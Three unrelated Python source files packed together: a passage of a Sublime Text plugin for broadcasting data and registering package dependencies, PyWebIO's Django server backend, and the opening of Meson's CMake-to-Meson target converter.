class LintJavaReceiver(packagemeta.Receiver):
channel = "lint_java"
def receive(self, data):
pass # handle data
The type of data received is determined by the broadcaster. Multiple receivers can watch
the same channel and all receivers will be notified.
Attributes:
channel: key used to register a subclass for receiving broadcast data by the same name.
"""
channel = None
def receive(self, data):
pass
def _register_receivers():
"""Find all subclasses of Receiver and register them for receiving broadcast data"""
subs = Receiver.__subclasses__()
for sub in subs:
if sub.channel is None:
log.warning("Receiver %s failed to define `channel` member.", sub)
continue
_receivers[sub.channel] = _receivers.get(sub.channel, []) + [sub()]
# TODO could be better
sublime.set_timeout(_register_receivers, 3000)
def broadcast(channel, data):
"""Broadcast data on a given channel.
"""
if not isinstance(channel, (str, unicode)):
raise Exception("")
log.info("received broadcast for %s with data: %s", channel, data)
def _broadcast():
for receiver in _receivers.get(channel, []):
receiver.receive(data)
threading.Thread(target=_broadcast).start()
class PackageMetaBroadcastCommand(sublime_plugin.ApplicationCommand):
"""
"""
def run(self, channel, data):
broadcast(channel, data)
def is_visible(self):
return False
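# For illustration: another plugin can trigger a broadcast without importing PackageMeta directly by running
# the command above (the channel name and payload below are hypothetical):
#
#     sublime.run_command("package_meta_broadcast", {
#         "channel": "lint_java",
#         "data": {"file": "Foo.java", "errors": []},
#     })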
def exists(*pkgs):
for pkg in pkgs:
if not os.path.exists(os.path.join(sublime.packages_path(), pkg)):
return False
return True
def requires(*pkgs):
"""Decor for registering external dependencies within a module.
Use of this decor should be constrained to the module level if poossible.
When used, this registers the original module to be associated with a
package dependency for the associated function. If the package is not
available, then the function is not run, and `None` will be returned. For
example:
@packagemeta.requires("ExternalPackage")
def configure_externalpackage(settings):
settings.set("externalpackage_setting", True)
Since the package is associated with the module, a quick panel command
is also available for installing all dependencies via PackageControl.
See `packagemeta.InstallRequires` for more info.
"""
def _decor(fn):
global _requires
s = _requires.get(fn.__module__, set())
for pkg in pkgs:
s.add(pkg)
_requires[fn.__module__] = s
def _fn(*args, **kwargs):
if exists(*pkgs):
return fn(*args, **kwargs)
return _fn
return _decor
class PackageMetaSetRequiresCommand(sublime_plugin.WindowCommand):
"""WindowCommand to allow external plugins to register dependencies.
In cases where an external plugin doesn't want to import PackageMeta directly,
dependencies can still be registered via this window command. For example:
def set_requires():
kwargs = {
"module": set_requires.__module__,
"pkgs": ["PackageA", "PackageB"]
}
sublime.active_window().run_command("package_meta_set_requires", kwargs)
See `PackageMetaInstallRequiresCommand` for details on showing a quick panel
to install dependencies.
"""
def run(self, module=None, pkgs=[]):
log.debug("received module %s", module)
log.debug("received pkgs %s", pkgs)
global _requires
s = _requires.get(module, set())
for pkg in pkgs:
s.add(pkg)
_requires[module] = s
def is_visible(self):
return False
class PackageMetaInstallRequiresCommand(sublime_plugin.WindowCommand):
"""Base class for quick panel to install required pkgs
If a plugin uses `packagemeta.requires`, subclassing this
WindowCommand will provide a quick panel to list and install
missing packages. For example, in the plugin:
class PluginInstallRequiresCommand(packagemeta.PackageMetaInstallRequiresCommand):
def is_visible(self):
return self.visible()
And include the following in the plugin's sublime-commands file:
{
"caption": "Plugin: Install Dependencies",
"command": "plugin_install_requires"
}
The command will only be visible if a plugin passed to `packagemeta.requires`
is not installed.
If instead you're interacting with packagemeta via `run_command`, you'll first
need to declare required packages at an appropriate time for the type of plugin
being developed. See `PackageMetaSetRequiresCommand` for details on registering
dependencies.
Once dependencies are registered, create a WindowCommand such as:
class PluginInstallRequiresCommand(sublime_plugin.WindowCommand):
def run(self):
self.window.run_command("package_meta_install_requires", {"module": self.__module__})
Note: In all cases, only packages not installed will be displayed.
"""
def run(self, module=None):
log.debug("InstallRequiresCommand.run received module %s", module)
self.module = module
if not self.get_pkgs():
return
self.options = self.get_missing_pkgs()
if not self.options:
return
if len(self.options) > 1:
self.options.insert(0, "All Packages")
self.window.show_quick_panel(self.options, self.on_done)
def on_done(self, picked):
if picked == -1:
return
option = self.options[picked]
if option == "All Packages":
for name in self.options[1:]:
self.install_pkg(name)
else:
self.install_pkg(option)
def get_pkgs(self):
global _requires
return _requires.get(self.get_module(), [])
def get_module(self):
if not hasattr(self, "module") or self.module is None:
return self.__module__
return self.module
def get_missing_pkgs(self):
p = sublime.packages_path()
log.debug("packages_path: %s", p)
installed = os.listdir(p)
return [pkg for pkg in self.get_pkgs() if pkg not in installed]
@requires("Package Control")
def install_pkg(self, name):
"""
thread = PackageControl.PackageInstallerThread(PackageControl.PackageManager(), name, None)
thread.start()
PackageControl.ThreadProgress(thread, 'Installing package %s' % name,
'Package %s successfully %s' % (name, "installed"))
"""
pass
def is_visible(self):
return False
def visible(self):
if not self.get_missing_pkgs():
return False
return True
|
django.py
|
import json
import logging
import threading
from functools import partial
from django.http import HttpResponse, HttpRequest
from .httpbased import HttpContext, HttpHandler, run_event_loop
from .utils import make_applications
from ..utils import STATIC_PATH, iscoroutinefunction, isgeneratorfunction, get_free_port
logger = logging.getLogger(__name__)
class DjangoHttpContext(HttpContext):
backend_name = 'django'
def __init__(self, request: HttpRequest):
self.request = request
self.response = HttpResponse()
def request_obj(self):
"""返回当前请求对象"""
return self.request
def request_method(self):
"""返回当前请求的方法,大写"""
return self.request.method
def request_headers(self):
"""返回当前请求的header字典"""
return self.request.headers
def request_url_parameter(self, name, default=None):
"""返回当前请求的URL参数"""
return self.request.GET.get(name, default=default)
def request_json(self):
"""返回当前请求的json反序列化后的内容,若请求数据不为json格式,返回None"""
try:
return json.loads(self.request.body.decode('utf8'))
except Exception:
return None
def set_header(self, name, value):
"""为当前响应设置header"""
self.response[name] = value
def set_status(self, status: int):
"""为当前响应设置http status"""
self.response.status_code = status
def set_content(self, content, json_type=False):
"""设置相应的内容
:param content:
:param bool json_type: content是否要序列化成json格式,并将 content-type 设置为application/json
"""
if json_type:
self.set_header('content-type', 'application/json')
self.response.content = json.dumps(content)
else:
self.response.content = content
def get_response(self):
"""获取当前的响应对象,用于在私图函数中返回"""
return self.response
def get_client_ip(self):
"""获取用户的ip"""
return self.request.META.get('REMOTE_ADDR')
def webio_view(applications,
session_expire_seconds=None,
session_cleanup_interval=None,
allowed_origins=None, check_origin=None):
"""获取在django中运行PyWebIO任务的视图函数。
基于http请求与前端进行通讯
:param list/dict/callable applications: PyWebIO应用。
:param int session_expire_seconds: 会话不活跃过期时间。
:param int session_cleanup_interval: 会话清理间隔。
:param list allowed_origins: 除当前域名外,服务器还允许的请求的来源列表。
:param callable check_origin: 请求来源检查函数。
关于各参数的详细说明见 :func:`pywebio.platform.django.start_server` 的同名参数。
:return: Django视图函数
"""
handler = HttpHandler(applications=applications,
session_expire_seconds=session_expire_seconds,
session_cleanup_interval=session_cleanup_interval,
allowed_origins=allowed_origins, check_origin=check_origin)
from django.views.decorators.csrf import csrf_exempt
@csrf_exempt
def view_func(request):
context = DjangoHttpContext(request)
return handler.handle_request(context)
view_func.__name__ = 'webio_view'
return view_func
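# A minimal usage sketch (``task_func`` is a hypothetical PyWebIO task function; this belongs in a Django
# project's urls.py rather than being run here):
#
#     # urls.py
#     from django.urls import path
#     from pywebio.platform.django import webio_view
#
#     urlpatterns = [
#         path(r"tool", webio_view(task_func)),
#     ]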
urlpatterns = []
def start_server(applications, port=8080, host='localhost',
allowed_origins=None, check_origin=None,
disable_asyncio=False,
session_cleanup_interval=None,
session_expire_seconds=None,
debug=False, **django_options):
"""启动一个 Django server 将PyWebIO应用作为Web服务提供。
:param list/dict/callable applications: PyWebIO应用. 格式同 :func:`pywebio.platform.tornado.start_server` 的 ``applications`` 参数
:param int port: 服务监听的端口。设置为 ``0`` 时,表示自动选择可用端口。
:param str host: 服务绑定的地址。 ``host`` 可以是IP地址或者为hostname。如果为hostname,服务会监听所有与该hostname关联的IP地址。
通过设置 ``host`` 为空字符串或 ``None`` 来将服务绑定到所有可用的地址上。
:param list allowed_origins: 除当前域名外,服务器还允许的请求的来源列表。
来源包含协议、域名和端口部分,允许使用 Unix shell 风格的匹配模式(全部规则参见 `Python文档 <https://docs.python.org/zh-tw/3/library/fnmatch.html>`_ ):
- ``*`` 为通配符
- ``?`` 匹配单个字符
- ``[seq]`` 匹配seq中的字符
- ``[!seq]`` 匹配不在seq中的字符
比如 ``https://*.example.com`` 、 ``*://*.example.com``
:param callable check_origin: 请求来源检查函数。接收请求来源(包含协议、域名和端口部分)字符串,
返回 ``True/False`` 。若设置了 ``check_origin`` , ``allowed_origins`` 参数将被忽略
:param bool disable_asyncio: 禁用 asyncio 函数。仅在任务函数为协程函数时有效。
.. note:: 实现说明:
当使用Django backend时,若要在PyWebIO的会话中使用 ``asyncio`` 标准库里的协程函数,PyWebIO需要单独开启一个线程来运行 ``asyncio`` 事件循环,
若程序中没有使用到 ``asyncio`` 中的异步函数,可以开启此选项来避免不必要的资源浪费
:param int session_expire_seconds: 会话过期时间。若 session_expire_seconds 秒内没有收到客户端的请求,则认为会话过期。
:param int session_cleanup_interval: 会话清理间隔。
:param bool debug: 开启 Django debug mode 和一般访问日志的记录
:param django_options: django应用的其他设置,见 https://docs.djangoproject.com/en/3.0/ref/settings/ .
其中 ``DEBUG`` 、 ``ALLOWED_HOSTS`` 、 ``ROOT_URLCONF`` 、 ``SECRET_KEY`` 被PyWebIO设置,无法在 ``django_options`` 中指定
"""
global urlpatterns
from django.conf import settings
from django.core.wsgi import get_wsgi_application
from django.urls import path
from django.utils.crypto import get_random_string
from django.views.static import serve
from django.core.management import call_command
if port == 0:
port = get_free_port()
if not host:
host = '0.0.0.0'
django_options.update(dict(
DEBUG=debug,
ALLOWED_HOSTS=["*"], # Disable host header validation
ROOT_URLCONF=__name__, # Make this module the urlconf
SECRET_KEY=get_random_string(10), # We aren't using any security features but Django requires this setting
))
django_options.setdefault('LOGGING', {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'simple': {
'format': '[%(asctime)s] %(message)s'
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
},
'loggers': {
'django.server': {
'level': 'INFO' if debug else 'WARN',
'handlers': ['console'],
},
},
})
settings.configure(**django_options)
webio_view_func = webio_view(
applications=applications,
session_expire_seconds=session_expire_seconds,
session_cleanup_interval=session_cleanup_interval,
allowed_origins=allowed_origins,
check_origin=check_origin
)
urlpatterns = [
path(r"io", webio_view_func),
path(r'', partial(serve, path='index.html'), {'document_root': STATIC_PATH}),
path(r'<path:path>', serve, {'document_root': STATIC_PATH}),
]
app = get_wsgi_application() # load app
has_coro_target = any(iscoroutinefunction(target) or isgeneratorfunction(target) for
target in make_applications(applications).values())
if not disable_asyncio and has_coro_target:
threading.Thread(target=run_event_loop, daemon=True).start()
# call_command('runserver', '%s:%d' % (host, port))
# or use below code to run web app
import tornado.wsgi
import tornado.httpserver
import tornado.ioloop
container = tornado.wsgi.WSGIContainer(app)
http_server = tornado.httpserver.HTTPServer(container)
http_server.listen(port, address=host)
tornado.ioloop.IOLoop.current().start()
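# A minimal usage sketch of start_server() (``hello`` is a hypothetical PyWebIO task function):
#
#     from pywebio.output import put_text
#
#     def hello():
#         put_text("Hello from PyWebIO on Django!")
#
#     if __name__ == '__main__':
#         start_server(hello, port=8080)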
|
interpreter.py
|
# Copyright 2019 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This class contains the basic functionality needed to run any interpreter
# or an interpreter-based tool.
from .common import CMakeException, CMakeTarget
from .client import CMakeClient, RequestCMakeInputs, RequestConfigure, RequestCompute, RequestCodeModel
from .fileapi import CMakeFileAPI
from .executor import CMakeExecutor
from .traceparser import CMakeTraceParser, CMakeGeneratorTarget
from .. import mlog
from ..environment import Environment
from ..mesonlib import MachineChoice, version_compare
from ..compilers.compilers import lang_suffixes, header_suffixes, obj_suffixes, lib_suffixes, is_header
from subprocess import Popen, PIPE
from typing import Any, List, Dict, Optional, Union, TYPE_CHECKING
from threading import Thread
from enum import Enum
import os, re
from ..mparser import (
Token,
BaseNode,
CodeBlockNode,
FunctionNode,
ArrayNode,
ArgumentNode,
AssignmentNode,
BooleanNode,
StringNode,
IdNode,
IndexNode,
MethodNode,
NumberNode,
)
if TYPE_CHECKING:
from ..build import Build
from ..backend.backends import Backend
# Disable all warnings automatically enabled with --trace and friends
# See https://cmake.org/cmake/help/latest/variable/CMAKE_POLICY_WARNING_CMPNNNN.html
disable_policy_warnings = [
'CMP0025',
'CMP0047',
'CMP0056',
'CMP0060',
'CMP0065',
'CMP0066',
'CMP0067',
'CMP0082',
'CMP0089',
]
backend_generator_map = {
'ninja': 'Ninja',
'xcode': 'Xcode',
'vs2010': 'Visual Studio 10 2010',
'vs2015': 'Visual Studio 15 2017',
'vs2017': 'Visual Studio 15 2017',
'vs2019': 'Visual Studio 16 2019',
}
language_map = {
'c': 'C',
'cpp': 'CXX',
'cuda': 'CUDA',
'cs': 'CSharp',
'java': 'Java',
'fortran': 'Fortran',
'swift': 'Swift',
}
target_type_map = {
'STATIC_LIBRARY': 'static_library',
'MODULE_LIBRARY': 'shared_module',
'SHARED_LIBRARY': 'shared_library',
'EXECUTABLE': 'executable',
'OBJECT_LIBRARY': 'static_library',
'INTERFACE_LIBRARY': 'header_only'
}
skip_targets = ['UTILITY']
blacklist_compiler_flags = [
'-Wall', '-Wextra', '-Weverything', '-Werror', '-Wpedantic', '-pedantic', '-w',
'/W1', '/W2', '/W3', '/W4', '/Wall', '/WX', '/w',
'/O1', '/O2', '/Ob', '/Od', '/Og', '/Oi', '/Os', '/Ot', '/Ox', '/Oy', '/Ob0',
'/RTC1', '/RTCc', '/RTCs', '/RTCu',
'/Z7', '/Zi', '/ZI',
]
blacklist_link_flags = [
'/machine:x64', '/machine:x86', '/machine:arm', '/machine:ebc',
'/debug', '/debug:fastlink', '/debug:full', '/debug:none',
'/incremental',
]
blacklist_clang_cl_link_flags = ['/GR', '/EHsc', '/MDd', '/Zi', '/RTC1']
blacklist_link_libs = [
'kernel32.lib',
'user32.lib',
'gdi32.lib',
'winspool.lib',
'shell32.lib',
'ole32.lib',
'oleaut32.lib',
'uuid.lib',
'comdlg32.lib',
'advapi32.lib'
]
generated_target_name_prefix = 'cm_'
transfer_dependencies_from = ['header_only']
class OutputTargetMap:
rm_so_version = re.compile(r'(\.[0-9]+)+$')
def __init__(self, build_dir: str):
self.tgt_map = {}
self.build_dir = build_dir
def add(self, tgt: Union['ConverterTarget', 'ConverterCustomTarget']) -> None:
def assign_keys(keys: List[str]) -> None:
for i in [x for x in keys if x]:
self.tgt_map[i] = tgt
keys = [self._target_key(tgt.cmake_name)]
if isinstance(tgt, ConverterTarget):
keys += [tgt.full_name]
keys += [self._rel_artifact_key(x) for x in tgt.artifacts]
keys += [self._base_artifact_key(x) for x in tgt.artifacts]
if isinstance(tgt, ConverterCustomTarget):
keys += [self._rel_generated_file_key(x) for x in tgt.original_outputs]
keys += [self._base_generated_file_key(x) for x in tgt.original_outputs]
assign_keys(keys)
def _return_first_valid_key(self, keys: List[str]) -> Optional[Union['ConverterTarget', 'ConverterCustomTarget']]:
for i in keys:
if i and i in self.tgt_map:
return self.tgt_map[i]
return None
def target(self, name: str) -> Optional[Union['ConverterTarget', 'ConverterCustomTarget']]:
return self._return_first_valid_key([self._target_key(name)])
def artifact(self, name: str) -> Optional[Union['ConverterTarget', 'ConverterCustomTarget']]:
keys = []
candidates = [name, OutputTargetMap.rm_so_version.sub('', name)]
for i in lib_suffixes:
if not name.endswith('.' + i):
continue
new_name = name[:-len(i) - 1]
new_name = OutputTargetMap.rm_so_version.sub('', new_name)
candidates += ['{}.{}'.format(new_name, i)]
for i in candidates:
keys += [self._rel_artifact_key(i), os.path.basename(i), self._base_artifact_key(i)]
return self._return_first_valid_key(keys)
def generated(self, name: str) -> Optional[Union['ConverterTarget', 'ConverterCustomTarget']]:
return self._return_first_valid_key([self._rel_generated_file_key(name), self._base_generated_file_key(name)])
# Utility functions to generate local keys
def _rel_path(self, fname: str) -> Optional[str]:
fname = os.path.normpath(os.path.join(self.build_dir, fname))
if os.path.commonpath([self.build_dir, fname]) != self.build_dir:
return None
return os.path.relpath(fname, self.build_dir)
def _target_key(self, tgt_name: str) -> str:
return '__tgt_{}__'.format(tgt_name)
def _rel_generated_file_key(self, fname: str) -> Optional[str]:
path = self._rel_path(fname)
return '__relgen_{}__'.format(path) if path else None
def _base_generated_file_key(self, fname: str) -> str:
return '__gen_{}__'.format(os.path.basename(fname))
def _rel_artifact_key(self, fname: str) -> Optional[str]:
path = self._rel_path(fname)
return '__relart_{}__'.format(path) if path else None
def _base_artifact_key(self, fname: str) -> str:
return '__art_{}__'.format(os.path.basename(fname))
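# For illustration (hypothetical values): a CMake target named ``foo`` producing the artifact ``libfoo.so``
# inside the build directory is registered above under keys such as ``__tgt_foo__`` (target name),
# ``__relart_libfoo.so__`` (artifact path relative to the build dir) and ``__art_libfoo.so__`` (artifact
# basename), so it can later be resolved via target() or artifact().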
class ConverterTarget:
def __init__(self, target: CMakeTarget, env: Environment):
self.env = env
self.artifacts = target.artifacts
self.src_dir = target.src_dir
self.build_dir = target.build_dir
self.name = target.name
self.cmake_name = target.name
self.full_name = target.full_name
self.type = target.type
self.install = target.install
self.install_dir = ''
self.link_libraries = target.link_libraries
self.link_flags = target.link_flags + target.link_lang_flags
self.depends_raw = []
self.depends = []
if target.install_paths:
self.install_dir = target.install_paths[0]
self.languages = []
self.sources = []
self.generated = []
self.includes = []
self.sys_includes = []
self.link_with = []
self.object_libs = []
self.compile_opts = {}
self.public_compile_opts = []
self.pie = False
# Project default override options (c_std, cpp_std, etc.)
self.override_options = []
# Convert the target name to a valid meson target name
self.name = self.name.replace('-', '_')
self.name = generated_target_name_prefix + self.name
for i in target.files:
# Determine the meson language
lang_cmake_to_meson = {val.lower(): key for key, val in language_map.items()}
lang = lang_cmake_to_meson.get(i.language.lower(), 'c')
if lang not in self.languages:
self.languages += [lang]
if lang not in self.compile_opts:
self.compile_opts[lang] = []
# Add arguments, but avoid duplicates
args = i.flags
args += ['-D{}'.format(x) for x in i.defines]
self.compile_opts[lang] += [x for x in args if x not in self.compile_opts[lang]]
# Handle include directories
self.includes += [x['path'] for x in i.includes if x not in self.includes and not x['isSystem']]
self.sys_includes += [x['path'] for x in i.includes if x not in self.sys_includes and x['isSystem']]
# Add sources to the right array
if i.is_generated:
self.generated += i.sources
else:
self.sources += i.sources
def __repr__(self) -> str:
return '<{}: {}>'.format(self.__class__.__name__, self.name)
std_regex = re.compile(r'([-]{1,2}std=|/std:v?|[-]{1,2}std:)(.*)')
def postprocess(self, output_target_map: OutputTargetMap, root_src_dir: str, subdir: str, install_prefix: str, trace: CMakeTraceParser) -> None:
# Detect setting the C and C++ standard
for i in ['c', 'cpp']:
if i not in self.compile_opts:
continue
temp = []
for j in self.compile_opts[i]:
m = ConverterTarget.std_regex.match(j)
if m:
self.override_options += ['{}_std={}'.format(i, m.group(2))]
elif j in ['-fPIC', '-fpic', '-fPIE', '-fpie']:
self.pie = True
elif j in blacklist_compiler_flags:
pass
else:
temp += [j]
self.compile_opts[i] = temp
# Make sure to force enable -fPIC for OBJECT libraries
if self.type.upper() == 'OBJECT_LIBRARY':
self.pie = True
# Use the CMake trace, if required
tgt = trace.targets.get(self.cmake_name)
if tgt:
self.depends_raw = trace.targets[self.cmake_name].depends
if self.type.upper() == 'INTERFACE_LIBRARY':
props = tgt.properties
self.includes += props.get('INTERFACE_INCLUDE_DIRECTORIES', [])
self.public_compile_opts += props.get('INTERFACE_COMPILE_DEFINITIONS', [])
self.public_compile_opts += props.get('INTERFACE_COMPILE_OPTIONS', [])
self.link_flags += props.get('INTERFACE_LINK_OPTIONS', [])
elif self.type.upper() not in ['EXECUTABLE', 'OBJECT_LIBRARY']:
mlog.warning('CMake: Target', mlog.bold(self.cmake_name), 'not found in CMake trace. This can lead to build errors')
temp = []
for i in self.link_libraries:
# Let meson handle this arcane magic
if ',-rpath,' in i:
continue
if not os.path.isabs(i):
link_with = output_target_map.artifact(i)
if link_with:
self.link_with += [link_with]
continue
temp += [i]
self.link_libraries = temp
# Filter out files that are not supported by the language
supported = list(header_suffixes) + list(obj_suffixes)
for i in self.languages:
supported += list(lang_suffixes[i])
supported = ['.{}'.format(x) for x in supported]
self.sources = [x for x in self.sources if any([x.endswith(y) for y in supported])]
self.generated = [x for x in self.generated if any([x.endswith(y) for y in supported])]
# Make paths relative
def rel_path(x: str, is_header: bool, is_generated: bool) -> Optional[str]:
if not os.path.isabs(x):
x = os.path.normpath(os.path.join(self.src_dir, x))
if not os.path.exists(x) and not any([x.endswith(y) for y in obj_suffixes]) and not is_generated:
mlog.warning('CMake: path', mlog.bold(x), 'does not exist. Ignoring. This can lead to build errors')
return None
if os.path.isabs(x) and os.path.commonpath([x, self.env.get_build_dir()]) == self.env.get_build_dir():
if is_header:
return os.path.relpath(x, os.path.join(self.env.get_build_dir(), subdir))
else:
return os.path.relpath(x, root_src_dir)
if os.path.isabs(x) and os.path.commonpath([x, root_src_dir]) == root_src_dir:
return os.path.relpath(x, root_src_dir)
return x
def custom_target(x: str):
ctgt = output_target_map.generated(x)
if ctgt:
assert(isinstance(ctgt, ConverterCustomTarget))
ref = ctgt.get_ref(x)
assert(isinstance(ref, CustomTargetReference) and ref.valid())
return ref
return x
build_dir_rel = os.path.relpath(self.build_dir, os.path.join(self.env.get_build_dir(), subdir))
self.includes = list(set([rel_path(x, True, False) for x in set(self.includes)] + [build_dir_rel]))
self.sys_includes = list(set([rel_path(x, True, False) for x in set(self.sys_includes)]))
self.sources = [rel_path(x, False, False) for x in self.sources]
self.generated = [rel_path(x, False, True) for x in self.generated]
# Resolve custom targets
self.generated = [custom_target(x) for x in self.generated]
# Remove deleted (None) entries
self.includes = [x for x in self.includes if x is not None]
self.sys_includes = [x for x in self.sys_includes if x is not None]
self.sources = [x for x in self.sources if x is not None]
self.generated = [x for x in self.generated if x is not None]
# Make sure '.' is always in the include directories
if '.' not in self.includes:
self.includes += ['.']
# make install dir relative to the install prefix
if self.install_dir and os.path.isabs(self.install_dir):
if os.path.commonpath([self.install_dir, install_prefix]) == install_prefix:
self.install_dir = os.path.relpath(self.install_dir, install_prefix)
# Remove blacklisted options and libs
def check_flag(flag: str) -> bool:
if flag.lower() in blacklist_link_flags or flag in blacklist_compiler_flags + blacklist_clang_cl_link_flags:
return False
if flag.startswith('/D'):
return False
return True
self.link_libraries = [x for x in self.link_libraries if x.lower() not in blacklist_link_libs]
self.link_flags = [x for x in self.link_flags if check_flag(x)]
# Handle explicit CMake add_dependency() calls
for i in self.depends_raw:
tgt = output_target_map.target(i)
if tgt:
self.depends.append(tgt)
def process_object_libs(self, obj_target_list: List['ConverterTarget']):
# Try to detect the object library(s) from the generated input sources
temp = [x for x in self.generated if isinstance(x, str)]
temp = [os.path.basename(x) for x in temp]
temp = [x for x in temp if any([x.endswith('.' + y) for y in obj_suffixes])]
temp = [os.path.splitext(x)[0] for x in temp]
# Temp now stores the source filenames of the object files
for i in obj_target_list:
source_files = [os.path.basename(x) for x in i.sources + i.generated]
for j in source_files:
if j in temp:
self.object_libs += [i]
break
# Filter out object files from the sources
self.generated = [x for x in self.generated if not isinstance(x, str) or not any([x.endswith('.' + y) for y in obj_suffixes])]
def process_inter_target_dependencies(self):
# Move the dependencies from all transfer_dependencies_from to the target
to_process = list(self.depends)
processed = []
new_deps = []
for i in to_process:
processed += [i]
if isinstance(i, ConverterTarget) and i.meson_func() in transfer_dependencies_from:
to_process += [x for x in i.depends if x not in processed]
else:
new_deps += [i]
self.depends = list(set(new_deps))
def cleanup_dependencies(self):
# Clear the dependencies from targets that were moved from
if self.meson_func() in transfer_dependencies_from:
self.depends = []
def meson_func(self) -> str:
return target_type_map.get(self.type.upper())
def log(self) -> None:
mlog.log('Target', mlog.bold(self.name), '({})'.format(self.cmake_name))
mlog.log(' -- artifacts: ', mlog.bold(str(self.artifacts)))
mlog.log(' -- full_name: ', mlog.bold(self.full_name))
mlog.log(' -- type: ', mlog.bold(self.type))
mlog.log(' -- install: ', mlog.bold('true' if self.install else 'false'))
mlog.log(' -- install_dir: ', mlog.bold(self.install_dir))
mlog.log(' -- link_libraries: ', mlog.bold(str(self.link_libraries)))
mlog.log(' -- link_with: ', mlog.bold(str(self.link_with)))
mlog.log(' -- object_libs: ', mlog.bold(str(self.object_libs)))
mlog.log(' -- link_flags: ', mlog.bold(str(self.link_flags)))
mlog.log(' -- languages: ', mlog.bold(str(self.languages)))
mlog.log(' -- includes: ', mlog.bold(str(self.includes)))
mlog.log(' -- sys_includes: ', mlog.bold(str(self.sys_includes)))
mlog.log(' -- sources: ', mlog.bold(str(self.sources)))
mlog.log(' -- generated: ', mlog.bold(str(self.generated)))
mlog.log(' -- pie: ', mlog.bold('true' if self.pie else 'false'))
mlog.log(' -- override_opts: ', mlog.bold(str(self.override_options)))
mlog.log(' -- depends: ', mlog.bold(str(self.depends)))
mlog.log(' -- options:')
for key, val in self.compile_opts.items():
mlog.log(' -', key, '=', mlog.bold(str(val)))
class CustomTargetReference:
def __init__(self, ctgt: 'ConverterCustomTarget', index: int):
self.ctgt = ctgt # type: ConverterCustomTarget
self.index = index # type: int
def __repr__(self) -> str:
if self.valid():
return '<{}: {} [{}]>'.format(self.__class__.__name__, self.ctgt.name, self.ctgt.outputs[self.index])
else:
return '<{}: INVALID REFERENCE>'.format(self.__class__.__name__)
def valid(self) -> bool:
return self.ctgt is not None and self.index >= 0
def filename(self) -> str:
return self.ctgt.outputs[self.index]
class ConverterCustomTarget:
tgt_counter = 0 # type: int
out_counter = 0 # type: int
def __init__(self, target: CMakeGeneratorTarget):
self.name = target.name
if not self.name:
self.name = 'custom_tgt_{}'.format(ConverterCustomTarget.tgt_counter)
ConverterCustomTarget.tgt_counter += 1
self.cmake_name = str(self.name)
self.original_outputs = list(target.outputs)
self.outputs = [os.path.basename(x) for x in self.original_outputs]
self.conflict_map = {}
self.command = target.command
self.working_dir = target.working_dir
self.depends_raw = target.depends
self.inputs = []
self.depends = []
# Convert the target name to a valid meson target name
self.name = self.name.replace('-', '_')
self.name = generated_target_name_prefix + self.name
def __repr__(self) -> str:
return '<{}: {} {}>'.format(self.__class__.__name__, self.name, self.outputs)
def postprocess(self, output_target_map: OutputTargetMap, root_src_dir: str, subdir: str, build_dir: str, all_outputs: List[str]) -> None:
# Default the working directory to the CMake build dir. This
# is not 100% correct, since it should be the value of
# ${CMAKE_CURRENT_BINARY_DIR} when add_custom_command is
# called. However, keeping track of this variable is not
# trivial and the current solution should work in most cases.
if not self.working_dir:
self.working_dir = build_dir
# relative paths in the working directory are always relative
# to ${CMAKE_CURRENT_BINARY_DIR} (see note above)
if not os.path.isabs(self.working_dir):
self.working_dir = os.path.normpath(os.path.join(build_dir, self.working_dir))
# Modify the original outputs if they are relative. Again,
# relative paths are relative to ${CMAKE_CURRENT_BINARY_DIR}
# and the first disclaimer is still in effect
def ensure_absolute(x: str):
if os.path.isabs(x):
return x
else:
return os.path.normpath(os.path.join(build_dir, x))
self.original_outputs = [ensure_absolute(x) for x in self.original_outputs]
# Ensure that there is no duplicate output in the project so
# that meson can handle cases where the same filename is
# generated in multiple directories
temp_outputs = [] # type: List[str]
for i in self.outputs:
if i in all_outputs:
old = str(i)
i = 'c{}_{}'.format(ConverterCustomTarget.out_counter, i)
ConverterCustomTarget.out_counter += 1
self.conflict_map[old] = i
all_outputs += [i]
temp_outputs += [i]
self.outputs = temp_outputs
# Check if the command is a build target
commands = []
for i in self.command:
assert(isinstance(i, list))
cmd = []
for j in i:
if not j:
continue
target = output_target_map.target(j)
cmd += [target] if target else [j]
commands += [cmd]
self.command = commands
# If the custom target does not declare any output, create a dummy
# one that can be used as dependency.
if not self.outputs:
self.outputs = [self.name + '.h']
# Check dependencies and input files
for i in self.depends_raw:
if not i:
continue
art = output_target_map.artifact(i)
tgt = output_target_map.target(i)
gen = output_target_map.generated(i)
if art:
self.depends += [art]
elif tgt:
self.depends += [tgt]
elif gen:
self.inputs += [gen.get_ref(i)]
elif not os.path.isabs(i) and os.path.exists(os.path.join(root_src_dir, i)):
self.inputs += [i]
elif os.path.isabs(i) and os.path.exists(i) and os.path.commonpath([i, root_src_dir]) == root_src_dir:
self.inputs += [os.path.relpath(i, root_src_dir)]
def process_inter_target_dependencies(self):
# Move the dependencies from all transfer_dependencies_from to the target
to_process = list(self.depends)
processed = []
new_deps = []
for i in to_process:
processed += [i]
if isinstance(i, ConverterTarget) and i.meson_func() in transfer_dependencies_from:
to_process += [x for x in i.depends if x not in processed]
else:
new_deps += [i]
self.depends = list(set(new_deps))
def get_ref(self, fname: str) -> Optional[CustomTargetReference]:
fname = os.path.basename(fname)
try:
if fname in self.conflict_map:
fname = self.conflict_map[fname]
idx = self.outputs.index(fname)
return CustomTargetReference(self, idx)
except ValueError:
return None
def log(self) -> None:
mlog.log('Custom Target', mlog.bold(self.name))
mlog.log(' -- command: ', mlog.bold(str(self.command)))
mlog.log(' -- outputs: ', mlog.bold(str(self.outputs)))
mlog.log(' -- conflict_map: ', mlog.bold(str(self.conflict_map)))
mlog.log(' -- working_dir: ', mlog.bold(str(self.working_dir)))
mlog.log(' -- depends_raw: ', mlog.bold(str(self.depends_raw)))
mlog.log(' -- inputs: ', mlog.bold(str(self.inputs)))
mlog.log(' -- depends: ', mlog.bold(str(self.depends)))
class CMakeAPI(Enum):
SERVER = 1
FILE = 2
class CMakeInterpreter:
def __init__(self, build: 'Build', subdir: str, src_dir: str, install_prefix: str, env: Environment, backend: 'Backend'):
assert(hasattr(backend, 'name'))
